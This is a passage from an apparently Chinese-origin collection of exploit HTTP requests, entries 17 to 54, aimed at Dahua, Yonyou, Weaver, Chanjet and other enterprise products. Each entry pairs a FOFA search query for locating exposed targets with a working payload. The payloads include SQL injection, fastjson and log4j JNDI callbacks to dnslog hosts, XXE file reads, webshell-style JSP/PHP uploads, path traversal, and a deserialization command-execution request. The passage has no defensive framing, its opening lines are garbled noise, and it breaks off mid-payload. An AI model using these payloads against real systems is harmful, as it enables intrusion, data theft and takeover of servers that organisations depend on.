5 b5 c, Q0 q9 {3 ?0 G. [( dAccept: */*( {4 [6 i5 o7 q. x
Accept-Language: en+ n1 P4 M3 m2 D
Accept-Encoding: gzip4 W, L3 i/ Q' Q: i, p
- t3 z# ]; `3 N8 E+ H
( @, v* h8 c5 F# O; R5 l
17. 大华 DSS itcBulletin SQL 注入
1 C0 P. G1 P, a! [1 R6 W8 P' nFOFA:app="dahua-DSS"# R: B: V6 x- k7 L
POST /portal/services/itcBulletin?wsdl HTTP/1.17 r* k! r2 ~& E. H* Z8 p
Host: x.x.x.x- N& w3 u3 _. H& O4 h* [: Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 \5 |8 p, w+ i, T  m; O/ s6 i
Connection: close
/ o2 p( E8 e2 b, g: C, e* W2 _" |Content-Length: 3458 x3 j! ^! @6 R, E, i+ b" e; c/ f
Accept-Encoding: gzip  h7 c; f) g! z( o) q, D$ x6 q
3 ]0 E' x$ {) f* a& i( x- K: X9 {
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
2 K+ v2 ^+ t7 S, E<s11:Body>7 H, X2 |7 ^( L, k: D) ]" j7 z
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
3 f  s0 q$ G4 w9 y      <netMarkings>
( @; p: s$ f+ K+ V6 J& ?* p3 w9 Y       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
5 g+ @4 p' d; @  ?      </netMarkings>& F5 P8 F$ u7 K- X& a
    </ns1:deleteBulletin>
; c+ Y6 v/ P& n  U) {  </s11:Body>
- I: G  c  H& H' y0 t' h2 y/ U1 \</s11:Envelope>* J8 \3 G6 ~9 y

1 H; q7 U+ M; h3 C+ T, G3 {' `* U
, ?7 H5 {. ~/ k* U% u/ E18. 大华 DSS 数字监控系统 user_edit.action 信息泄露1 c. S8 q# K% c/ L6 j9 h
FOFA:app="dahua-DSS"
$ J& r( h5 r. ~6 O$ U; d! ?GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1) m' z. S2 T/ ]% l
Host: your-ip
$ P) r6 e3 S" J9 W( LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 J0 Q1 P3 v# G7 t
Accept-Encoding: gzip, deflate! T" n* a! [5 v, _$ G
Accept: */*4 {# M2 V8 n1 q4 d. P' t( Q
Connection: keep-alive
/ K  S6 K( W; f( y9 K% ~
2 x9 f2 e2 U6 l  s. O* C: J- Q
) e& z0 {! x% R; l+ U! Y! ^3 F# @' n  q/ F2 G* ^6 H
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入% T- e/ e$ t  a5 x
FOFA:app="dahua-DSS"
6 p. P& d- a4 j: n& A  p/ S7 ?% @GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1/ k* A7 J( V: u! Q# N2 }
Host:+ E4 [! _: v2 B
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" m0 v( g+ M! s7 [" }# }! zAccept-Encoding: gzip, deflate
  B% p1 n% n! {+ c) i9 F# d& `9 CAccept: */*
5 A" h( S% ]) a4 p7 [( P( r8 mConnection: keep-alive9 s0 Q" \: z) a6 P& w# Z6 {
" H) X4 o$ _+ {+ b

% p" a# x( {, s: V' k" @, f20. 大华ICC智能物联综合管理平台任意文件读取
6 I1 ^, R. P6 c$ }& \0 ^+ KFOFA:body="*客户端会小于800*"7 G" a8 Q  x, i. z0 ~
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
$ D8 Z; t4 Q/ u- z7 z0 Q4 b% CHost: x.x.x.x
* E9 T6 a3 X  z7 Y) p& ^* kUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, N8 n4 P; \/ m# o4 H
Connection: close
7 C; R+ v/ ]: A1 d$ O+ `  u  BAccept: */*
* i1 ]; E/ Z' v( VAccept-Language: en
' P6 w6 l) m; D/ {Accept-Encoding: gzip
4 G) T; C6 P" v+ I% k( G
0 Z# s  I  I) \( Q* `) q5 f9 P0 U6 m6 l( I* X8 s6 S9 Q
21. 大华ICC智能物联综合管理平台random远程代码执行
' B7 @# F% T/ ~9 j$ fFOFA:icon_hash="-1935899595"/ x6 o3 r# j- L, u( u7 I$ o! s
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.11 n+ ?! w* Z2 B
Host: x.x.x.x
) h' k* y* d% `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ `4 ?& x- ^. Y9 nContent-Length: 161
3 A6 K* A- L  r: o. V% s/ rAccept-Encoding: gzip
+ N3 p! ^3 V, |& P! C+ MConnection: close* O  `( t5 ?. d( k' }* Y' {6 h
Content-Type: application/json;charset=utf-8( z8 {) s1 B) E  T1 e: x

8 @6 |! r/ @& s/ J# }8 ^{
8 _+ U; L; z( n' o"a":{
- E) X" n  }7 |  n, H2 S0 \: B   "@type":"com.alibaba.fastjson.JSONObject",$ P% _8 G! U. y0 j1 H, q
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
7 |& \' l6 d; R& j3 b  }"", D6 U8 ^% Q) E2 c) O% ?
}, b. ?- H  y' T7 e" z

# i2 {4 ]  L  V2 f
* K, h4 _5 [! q$ |# A2 e22. 大华ICC智能物联综合管理平台 log4j远程代码执行
" f$ j2 D2 _* \- {FOFA:icon_hash="-1935899595"
! n+ w; A5 p/ qPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1( O* E& s! i# q2 g" {+ [- ~
Host: your-ip
: j0 f* |8 j6 I* e. {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ _% T5 N) a' }/ G; \Content-Type: application/json;charset=utf-8
" G; ]" E/ k% r0 {7 n. p. E- x. F" I* X/ K. [/ O/ |, F
{7 ^' E  F' J$ p7 M( H( c
"loginName":"${jndi:ldap://dnslog}"
6 O3 H0 O1 ?: ?* M- |' Y# j}
# J/ H5 J+ R' c7 s! E+ d* {1 L
% L, b) u2 ?! G9 z2 m4 F3 _5 B
: q3 l0 @- h" Y& X) R2 O4 {  p, z
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行0 X! g7 D% E1 S. m& h" C: ?' L
FOFA:icon_hash="-1935899595"4 S- L7 K! L& z9 \4 o+ S/ G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
* a8 ^, i7 S* r. P& r3 GHost: your-ip
* s, C* b; W1 @5 w' W6 P% SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 O. M2 b+ M7 y; m. sContent-Type: application/json;charset=utf-8
9 \% H2 Y; G# p  y* q/ gAccept-Encoding: gzip, D" ^+ S3 P/ H3 t" e6 W
Connection: close
! ]6 i" O8 H) r4 U
, \/ P) k) m4 \2 g; p# _{
  f& @( r' E' R- \4 x    "a":{
+ \3 y* E" h" S3 N* u        "@type":"com.alibaba.fastjson.JSONObject",+ \% C" L, {$ u9 i% t/ g
       {"@type":"java.net.URL","val":"http://DNSLOG"}1 R, c/ C" p5 W( n* _  |
        }""
' V6 o1 C/ L+ L}
- S  d# n4 w5 g- i3 g$ W" O- H! C+ y& C' B4 g* q

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC652
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Business ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the specified string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
